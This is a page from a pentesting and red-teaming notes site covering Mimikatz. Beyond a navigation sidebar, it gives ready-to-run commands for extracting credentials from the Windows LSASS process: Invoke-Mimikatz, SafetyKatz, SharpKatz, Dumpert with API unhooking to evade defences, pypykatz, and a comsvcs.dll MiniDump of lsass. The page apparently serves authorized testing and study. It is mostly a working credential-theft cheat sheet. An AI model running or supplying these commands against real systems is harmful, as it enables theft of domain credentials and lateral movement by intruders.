Pentesting and Red Teaming Notes
  • 🖥️Pentesting and Red Teaming Cheatsheet
  • Web Application Pentesting(BlackBox)
    • SQL Injection
    • Blind SQL Injection
    • Path Traversal
    • Attacking Authentication
    • Race Conditions
    • Business Logic Vulnerabilities
    • Command Injections
    • Information disclosure
    • Access Controls
    • File upload Attacks
    • XXE
    • Server Side Request Forgery
    • Api Testing
    • noSQL
    • DOM based vulnerabilities
    • Cross Site scripting
  • Infrastructure Pentesting
    • Windows Privilege Escalation
    • Attacking Active Directory
    • File Transfers and Download
    • Pivoting(Tunneling and Port Forwarding)
    • Linux Privilege Escalation
    • Stealing NTLM hashes
    • Tricks and Tips
  • Active Directory Pentesting
    • powershell theory
    • Methodology
    • domain enumeration
    • File Transfer
    • PowerShell ADModule
    • Local Privilege Escalation
    • PowerView Commands
    • ACLs Descriptions
    • ACLs Abuse
    • ACL
    • Trusts
    • User Hunting
    • group policy
    • Mimikatz
    • BloodHound
    • LateralMovement
    • Kerberoasting
    • defense bypasses
    • Set-SPN
    • ASREProasting
    • Unconstrained Delegation
    • Constrained Delegation
    • Resource Based Constrained Delegation
    • AD CS
    • Persistance
    • Priv Esc Trusts Inside Forest
    • MSSQL Servers
    • Priv Esc Trusts Across Forest
    • Tips And Tricks
    • Service Tickets and Abuses
  • Reconnaissance
    • Web Application Reconnaissance
    • External Reconnaissance
Powered by GitBook
On this page
  • Mimikatz
  • Lateral Movement - Extracting credentials from LSASS
  • Dump credentials on a local machine
  • Using SafetyKatz(Minidumpof lsassand PELoaderto run Mimikatz)
  • Dump credentials Using SharpKatz(C# port of some of Mimikatz functionality)
  • Dump credentials using Dumpert(Direct System Calls and API unhooking)
  • Using pypykatz(Mimikatz functionality in Python)
  • Using comsvcs.dll
  • Over Pass The Hash Lateral Movement is in Lateral Movement section.
  1. Active Directory Pentesting

Mimikatz

Mimikatz

Mimikatz can be used to dump credentials, tickets, and many more interesting attacks.Invoke-Mimikatz, is a PowerShell port of Mimikatz. Using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory. All the functions of mimikatz could be used from this script.The script needs administrative privileges for dumping credentials from local machine. Many attacks need specific privileges which are covered while discussing that attack.

Lateral Movement - Extracting credentials from LSASS

Dump credentials on a local machine

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Using SafetyKatz(Minidumpof lsassand PELoaderto run Mimikatz)

SafetyKatz.exe "sekurlsa::ekeys"

Dump credentials Using SharpKatz(C# port of some of Mimikatz functionality)

SharpKatz.exe --Command ekeys

Dump credentials using Dumpert(Direct System Calls and API unhooking)

rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Using pypykatz(Mimikatz functionality in Python)

pypykatz.exe live lsa

Using comsvcs.dll

tasklist /FI "IMAGENAME eqlsass.exe" rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsassprocess ID> C:\Users\Public\lsass.dmp full

Over Pass The Hash Lateral Movement is in Lateral Movement section.

Previousgroup policyNextBloodHound

Last updated 10 months ago